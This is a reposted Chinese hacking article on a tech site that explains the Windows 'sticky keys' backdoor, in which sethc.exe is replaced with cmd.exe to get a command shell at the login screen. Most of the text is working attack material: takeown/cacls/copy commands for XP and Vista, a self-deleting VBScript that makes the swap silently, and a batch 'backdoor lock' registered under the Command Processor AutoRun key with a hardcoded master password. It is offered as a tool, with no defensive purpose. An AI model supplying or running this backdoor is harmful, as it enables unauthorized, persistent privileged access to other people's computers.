回顾曾经酷的Windows后门入侵

安全 黑客攻防
此文章主要介绍的是变态入侵之有史以来最酷的Windows后门,其中包括后门原理,Windows后门扩展等相关内容的描述。

此文章主要讲述的是变态入侵之有史以来最酷的Windows后门,本文主要阐述了有关Windows后门的一些知识。以下就是文章的主要内容的详细描述,望大家在浏览之后会对其有更深的了解。

后门原理:

 

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

XP:

将安装源光盘弹出(或将硬盘上的安装目录改名)

cd %widnir%\system32\dllcache

ren sethc.exe *.ex~

cd %widnir%\system32

copy /y cmd.exe sethc.exe

VISTA:

takeown /f c:\windows\system32\sethc.exe

cacls c:\windows\system32\sethc.exe /G administrator:F

然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

Windows后门扩展:

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)

success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)

success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)

success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)

success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)

success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

第二句最有意思了.自动应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码...

On Error Resume Next

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

Windows后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]

"AutoRun"="bdlock.bat"

@Echo Off

title 后门登陆验证

color a

cls

set temprandom=%RANDOM%

echo 请输入验证码:%temprandom%

set/p check=

if "%check%"=="%temprandom%%temprandom%" goto passcheck

if "%check%"=="%temprandom%" (

rem 后门服务器验证

rem 如果没有Windows后门验证服务器请rem注释掉下一行代码

if exist \192.168.8.8\backdoor$\pass goto passcheck

)

echo 验证失败

pause

exit

:passcheck

echo 验证成功

If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx

Set passcmdlock=http://blog.csdn.net/freexploit/

:allyesno

Set Errorlevel=>nul

Echo 请输入验证密码?

Set password=allyesno Is a pig>nul

Set/p password=

rem 万能密码

if "%password%"=="allyesno is a sb" goto endx

If %time:~1,1%==0 Set timechange=a

If %time:~1,1%==1 Set timechange=b

If %time:~1,1%==2 Set timechange=c

If %time:~1,1%==3 Set timechange=d

If %time:~1,1%==4 Set timechange=e

If %time:~1,1%==5 Set timechange=f

If %time:~1,1%==6 Set timechange=g

If %time:~1,1%==7 Set timechange=h

If %time:~1,1%==8 Set timechange=i

If %time:~1,1%==9 Set timechange=j

set/a sum=%time:~1,1%+%time:~1,1%

Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul

If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End

Echo 请联系客服咨询正确密码!&Goto allyesno

:End

Set password=>nul

Set Errorlevel=>nul

Echo

:endx

以上的相关内容就是对变态入侵:有史以来最酷的Windows后门的介绍,望你能有所收获。

 

责任编辑:佚名 来源: 豆瓣网
相关推荐

2010-09-09 19:43:29

2024-08-22 14:05:02

2014-06-19 15:44:31

2019-02-22 12:58:51

Windows 10微软开始菜单

2011-03-31 09:25:13

2011-03-31 08:56:32

2011-03-31 09:25:06

2021-03-30 08:43:29

黑客PHP团队Git

2013-03-20 16:05:38

2009-03-10 13:08:56

2011-03-15 14:31:32

2013-09-11 14:00:16

Windows 8.1

2009-11-25 09:11:30

2019-02-26 14:39:20

Windows后门漏洞

2009-07-19 11:13:52

windows后门安全

2011-03-31 09:25:10

2013-10-20 17:07:27

2021-04-19 08:02:54

Windows手工入侵

2011-03-15 15:41:43

2009-07-24 18:30:33

点赞
收藏

51CTO技术栈公众号